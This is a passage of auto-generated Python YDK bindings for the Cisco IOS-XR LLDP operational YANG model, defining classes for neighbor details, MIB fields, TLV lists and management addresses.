self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry))])
self._leafs = OrderedDict()
# Keyless YANG list of management-address entries.
self.lldp_addr_entry = YList(self)
self._segment_path = lambda: "network-addresses"
self._is_frozen = True
def __setattr__(self, name, value):
# No writable leaves on this container (empty leaf-name list).
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses, [], name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry, self).__init__()
self.yang_name = "lldp-addr-entry"
self.yang_parent_name = "network-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address))])
self._leafs = OrderedDict([
('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
])
self.ma_subtype = None
self.if_num = None
self.address = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address()
self.address.parent = self
self._children_name_map["address"] = "address"
self._segment_path = lambda: "lldp-addr-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry, ['ma_subtype', 'if_num'], name, value)
class Address(Entity):
"""
Network layer address
.. attribute:: address_type
AddressType
**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "lldp-addr-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.address_type = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Mib(Entity):
"""
MIB neighbor info
.. attribute:: unknown_tlv_list
Unknown TLV list
**type**\: :py:class:`UnknownTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList>`
.. attribute:: org_def_tlv_list
Org Def TLV list
**type**\: :py:class:`OrgDefTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList>`
.. attribute:: rem_time_mark
TimeFilter
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_local_port_num
LldpPortNumber
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_index
lldpRemIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: chassis_id_sub_type
Chassis ID sub type
**type**\: int
**range:** 0..255
.. attribute:: chassis_id_len
Chassis ID length
**type**\: int
**range:** 0..65535
.. attribute:: port_id_sub_type
Port ID sub type
**type**\: int
**range:** 0..255
.. attribute:: port_id_len
Port ID length
**type**\: int
**range:** 0..65535
.. attribute:: combined_capabilities
Supported and combined capabilities
**type**\: int
**range:** 0..4294967295
"""
# Auto-generated YDK binding: LLDP-MIB style view of the neighbor entry
# (lldpRemTable fields plus unknown / organizationally-defined TLV lists).
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Statement order matters: the overridden __setattr__ validates writes
# once _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib, self).__init__()
self.yang_name = "mib"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("unknown-tlv-list", ("unknown_tlv_list", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList)), ("org-def-tlv-list", ("org_def_tlv_list", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList))])
self._leafs = OrderedDict([
('rem_time_mark', (YLeaf(YType.uint32, 'rem-time-mark'), ['int'])),
('rem_local_port_num', (YLeaf(YType.uint32, 'rem-local-port-num'), ['int'])),
('rem_index', (YLeaf(YType.uint32, 'rem-index'), ['int'])),
('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
('chassis_id_len', (YLeaf(YType.uint16, 'chassis-id-len'), ['int'])),
('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
('port_id_len', (YLeaf(YType.uint16, 'port-id-len'), ['int'])),
('combined_capabilities', (YLeaf(YType.uint32, 'combined-capabilities'), ['int'])),
])
self.rem_time_mark = None
self.rem_local_port_num = None
self.rem_index = None
self.chassis_id_sub_type = None
self.chassis_id_len = None
self.port_id_sub_type = None
self.port_id_len = None
self.combined_capabilities = None
# Wire up the two singleton child containers.
self.unknown_tlv_list = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList()
self.unknown_tlv_list.parent = self
self._children_name_map["unknown_tlv_list"] = "unknown-tlv-list"
self.org_def_tlv_list = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList()
self.org_def_tlv_list.parent = self
self._children_name_map["org_def_tlv_list"] = "org-def-tlv-list"
self._segment_path = lambda: "mib"
# Freeze last: from here on only declared leaf names can be assigned.
self._is_frozen = True
def __setattr__(self, name, value):
# Delegate to YDK's checked setter with the writable leaf names.
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib, ['rem_time_mark', 'rem_local_port_num', 'rem_index', 'chassis_id_sub_type', 'chassis_id_len', 'port_id_sub_type', 'port_id_len', 'combined_capabilities'], name, value)
class UnknownTlvList(Entity):
"""
Unknown TLV list
.. attribute:: lldp_unknown_tlv_entry
lldp unknown tlv entry
**type**\: list of :py:class:`LldpUnknownTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList, self).__init__()
self.yang_name = "unknown-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-unknown-tlv-entry", ("lldp_unknown_tlv_entry", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry))])
self._leafs = OrderedDict()
# Keyless YANG list of TLVs the device did not recognize.
self.lldp_unknown_tlv_entry = YList(self)
self._segment_path = lambda: "unknown-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList, [], name, value)
class LldpUnknownTlvEntry(Entity):
"""
lldp unknown tlv entry
.. attribute:: tlv_type
Unknown TLV type
**type**\: int
**range:** 0..255
.. attribute:: tlv_value
Unknown TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, self).__init__()
self.yang_name = "lldp-unknown-tlv-entry"
self.yang_parent_name = "unknown-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('tlv_type', (YLeaf(YType.uint8, 'tlv-type'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.tlv_type = None
self.tlv_value = None
self._segment_path = lambda: "lldp-unknown-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, ['tlv_type', 'tlv_value'], name, value)
class OrgDefTlvList(Entity):
"""
Org Def TLV list
.. attribute:: lldp_org_def_tlv_entry
lldp org def tlv entry
**type**\: list of :py:class:`LldpOrgDefTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList, self).__init__()
self.yang_name = "org-def-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-org-def-tlv-entry", ("lldp_org_def_tlv_entry", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry))])
self._leafs = OrderedDict()
# Keyless YANG list of organizationally-defined (OUI-scoped) TLVs.
self.lldp_org_def_tlv_entry = YList(self)
self._segment_path = lambda: "org-def-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList, [], name, value)
class LldpOrgDefTlvEntry(Entity):
"""
lldp org def tlv entry
.. attribute:: oui
Organizationally Unique Identifier
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_subtype
Org Def TLV subtype
**type**\: int
**range:** 0..255
.. attribute:: tlv_info_indes
lldpRemOrgDefInfoIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_value
Org Def TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
# NOTE(review): 'tlv_info_indes' looks like a generator-propagated typo of
# "index", but it mirrors the YANG leaf name 'tlv-info-indes' and must not
# be renamed here — it is part of the model's wire contract.
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, self).__init__()
self.yang_name = "lldp-org-def-tlv-entry"
self.yang_parent_name = "org-def-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('oui', (YLeaf(YType.uint32, 'oui'), ['int'])),
('tlv_subtype', (YLeaf(YType.uint8, 'tlv-subtype'), ['int'])),
('tlv_info_indes', (YLeaf(YType.uint32, 'tlv-info-indes'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.oui = None
self.tlv_subtype = None
self.tlv_info_indes = None
self.tlv_value = None
self._segment_path = lambda: "lldp-org-def-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, ['oui', 'tlv_subtype', 'tlv_info_indes', 'tlv_value'], name, value)
class Summaries(Entity):
"""
The LLDP neighbor summary table
.. attribute:: summary
Brief information about a LLDP neighbor entry
**type**\: list of :py:class:`Summary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary>`
"""
# Auto-generated YDK binding: container holding the per-interface LLDP
# neighbor summary list.
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Assignment order matters: __setattr__ validates writes once
# _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Summaries, self).__init__()
self.yang_name = "summaries"
self.yang_parent_name = "neighbors"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary", ("summary", Lldp.Nodes.Node.Neighbors.Summaries.Summary))])
self._leafs = OrderedDict()
# Keyless YANG list of summary entries.
self.summary = YList(self)
self._segment_path = lambda: "summaries"
self._is_frozen = True
def __setattr__(self, name, value):
# No writable leaves on this container (empty leaf-name list).
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries, [], name, value)
class Summary(Entity):
"""
Brief information about a LLDP neighbor
entry
.. attribute:: interface_name
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
The neighboring device identifier
**type**\: str
.. attribute:: lldp_neighbor
lldp neighbor
**type**\: list of :py:class:`LldpNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Assignment order matters: __setattr__ validates writes once
# _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary, self).__init__()
self.yang_name = "summary"
self.yang_parent_name = "summaries"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-neighbor", ("lldp_neighbor", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
])
self.interface_name = None
self.device_id = None
# Keyless YANG list of neighbor records for this interface/device pair.
self.lldp_neighbor = YList(self)
self._segment_path = lambda: "summary"
self._is_frozen = True
def __setattr__(self, name, value):
# Delegate to YDK's checked setter with the writable leaf names.
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary, ['interface_name', 'device_id'], name, value)
class LldpNeighbor(Entity):
"""
lldp neighbor
.. attribute:: detail
Detailed neighbor info
**type**\: :py:class:`Detail <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail>`
.. attribute:: mib
MIB neighbor info
**type**\: :py:class:`Mib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib>`
.. attribute:: receiving_interface_name
Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: receiving_parent_interface_name
Parent Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
Device identifier
**type**\: str
.. attribute:: chassis_id
Chassis id
**type**\: str
.. attribute:: port_id_detail
Outgoing port identifier
**type**\: str
.. attribute:: header_version
Version number
**type**\: int
**range:** 0..255
.. attribute:: hold_time
Remaining hold time
**type**\: int
**range:** 0..65535
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: platform
Platform type
**type**\: str
"""
# Auto-generated YDK binding: one LLDP neighbor record under the summary
# table, with "detail" and "mib" child containers.
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Statement order matters: the overridden __setattr__ validates writes
# once _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor, self).__init__()
self.yang_name = "lldp-neighbor"
self.yang_parent_name = "summary"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail)), ("mib", ("mib", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib))])
self._leafs = OrderedDict([
('receiving_interface_name', (YLeaf(YType.str, 'receiving-interface-name'), ['str'])),
('receiving_parent_interface_name', (YLeaf(YType.str, 'receiving-parent-interface-name'), ['str'])),
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
('port_id_detail', (YLeaf(YType.str, 'port-id-detail'), ['str'])),
('header_version', (YLeaf(YType.uint8, 'header-version'), ['int'])),
('hold_time', (YLeaf(YType.uint16, 'hold-time'), ['int'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('platform', (YLeaf(YType.str, 'platform'), ['str'])),
])
self.receiving_interface_name = None
self.receiving_parent_interface_name = None
self.device_id = None
self.chassis_id = None
self.port_id_detail = None
self.header_version = None
self.hold_time = None
self.enabled_capabilities = None
self.platform = None
# Wire up the two singleton child containers.
self.detail = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail()
self.detail.parent = self
self._children_name_map["detail"] = "detail"
self.mib = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib()
self.mib.parent = self
self._children_name_map["mib"] = "mib"
self._segment_path = lambda: "lldp-neighbor"
# Freeze last: from here on only declared leaf names can be assigned.
self._is_frozen = True
def __setattr__(self, name, value):
# Delegate to YDK's checked setter with the writable leaf names.
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor, ['receiving_interface_name', 'receiving_parent_interface_name', 'device_id', 'chassis_id', 'port_id_detail', 'header_version', 'hold_time', 'enabled_capabilities', 'platform'], name, value)
class Detail(Entity):
"""
Detailed neighbor info
.. attribute:: network_addresses
Management Addresses
**type**\: :py:class:`NetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses>`
.. attribute:: peer_mac_address
Peer Mac Address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
.. attribute:: port_description
Port Description
**type**\: str
.. attribute:: system_name
System Name
**type**\: str
.. attribute:: system_description
System Description
**type**\: str
.. attribute:: time_remaining
Time remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: system_capabilities
System Capabilities
**type**\: str
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: auto_negotiation
Auto Negotiation
**type**\: str
.. attribute:: physical_media_capabilities
Physical media capabilities
**type**\: str
.. attribute:: media_attachment_unit_type
Media Attachment Unit type
**type**\: int
**range:** 0..4294967295
.. attribute:: port_vlan_id
Vlan ID
**type**\: int
**range:** 0..4294967295
"""
# Auto-generated YDK binding: detailed TLV data for a neighbor under the
# summary table (mirrors the Details.Detail.LldpNeighbor.Detail_ schema).
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Statement order matters: the overridden __setattr__ validates writes
# once _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail, self).__init__()
self.yang_name = "detail"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network-addresses", ("network_addresses", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses))])
self._leafs = OrderedDict([
('peer_mac_address', (YLeaf(YType.str, 'peer-mac-address'), ['str'])),
('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
('system_description', (YLeaf(YType.str, 'system-description'), ['str'])),
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('system_capabilities', (YLeaf(YType.str, 'system-capabilities'), ['str'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('auto_negotiation', (YLeaf(YType.str, 'auto-negotiation'), ['str'])),
('physical_media_capabilities', (YLeaf(YType.str, 'physical-media-capabilities'), ['str'])),
('media_attachment_unit_type', (YLeaf(YType.uint32, 'media-attachment-unit-type'), ['int'])),
('port_vlan_id', (YLeaf(YType.uint32, 'port-vlan-id'), ['int'])),
])
self.peer_mac_address = None
self.port_description = None
self.system_name = None
self.system_description = None
self.time_remaining = None
self.system_capabilities = None
self.enabled_capabilities = None
self.auto_negotiation = None
self.physical_media_capabilities = None
self.media_attachment_unit_type = None
self.port_vlan_id = None
# Wire up the singleton child container.
self.network_addresses = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses()
self.network_addresses.parent = self
self._children_name_map["network_addresses"] = "network-addresses"
self._segment_path = lambda: "detail"
# Freeze last: from here on only declared leaf names can be assigned.
self._is_frozen = True
def __setattr__(self, name, value):
# Delegate to YDK's checked setter with the writable leaf names.
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail, ['peer_mac_address', 'port_description', 'system_name', 'system_description', 'time_remaining', 'system_capabilities', 'enabled_capabilities', 'auto_negotiation', 'physical_media_capabilities', 'media_attachment_unit_type', 'port_vlan_id'], name, value)
class NetworkAddresses(Entity):
"""
Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses, self).__init__()
self.yang_name = "network-addresses"
self.yang_parent_name = "detail"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry))])
self._leafs = OrderedDict()
# Keyless YANG list of management-address entries.
self.lldp_addr_entry = YList(self)
self._segment_path = lambda: "network-addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses, [], name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, self).__init__()
self.yang_name = "lldp-addr-entry"
self.yang_parent_name = "network-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address))])
self._leafs = OrderedDict([
('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
])
self.ma_subtype = None
self.if_num = None
self.address = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address()
self.address.parent = self
self._children_name_map["address"] = "address"
self._segment_path = lambda: "lldp-addr-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, ['ma_subtype', 'if_num'], name, value)
class Address(Entity):
"""
Network layer address
.. attribute:: address_type
AddressType
**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "lldp-addr-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.address_type = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Mib(Entity):
"""
MIB neighbor info
.. attribute:: unknown_tlv_list
Unknown TLV list
**type**\: :py:class:`UnknownTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList>`
.. attribute:: org_def_tlv_list
Org Def TLV list
**type**\: :py:class:`OrgDefTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList>`
.. attribute:: rem_time_mark
TimeFilter
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_local_port_num
LldpPortNumber
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_index
lldpRemIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: chassis_id_sub_type
Chassis ID sub type
**type**\: int
**range:** 0..255
.. attribute:: chassis_id_len
Chassis ID length
**type**\: int
**range:** 0..65535
.. attribute:: port_id_sub_type
Port ID sub type
